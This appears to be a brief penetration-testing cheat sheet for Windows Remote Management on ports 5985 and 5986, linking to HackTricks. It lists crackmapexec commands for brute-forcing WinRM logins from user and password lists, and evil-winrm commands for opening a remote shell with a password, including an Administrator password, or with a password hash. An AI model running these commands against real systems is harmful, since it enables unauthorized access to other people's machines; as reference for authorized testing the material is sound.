Skip to content

5985,5986 - Pentesting winrm

windows

bruteforce user / password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success
evil-winrm - with password
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
evil-winrm - with hash
evil-winrm -u <username> -H <Hash> -i <IP>

  • https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm